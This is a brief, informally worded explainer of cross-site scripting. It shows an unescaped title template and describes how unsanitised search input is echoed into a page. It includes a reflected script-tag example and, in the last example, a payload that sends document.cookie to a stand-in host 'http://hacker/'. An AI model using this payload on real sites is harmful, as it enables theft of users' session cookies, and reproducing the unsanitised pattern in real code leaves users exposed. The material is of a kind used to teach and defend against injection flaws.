cross-site scripting example
Example 1: xss commands
<title>Example document: %(title)</title>
Example 2: Cross-site scripting
XSS if you fill in a search field for example, and that variable is used
on the page somewhere, you could type in "bullshit."
"bullstit" appears in the markup. If the idiot that wrote the code doesn't
filter, limit, or otherwise sanitize that value. You could have a problem...
Dr. Evil could just type in some script ij the search field right?
<p>Your search for 'flowers <script>evil_script()</script>'
Example 3: xss commands
"><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>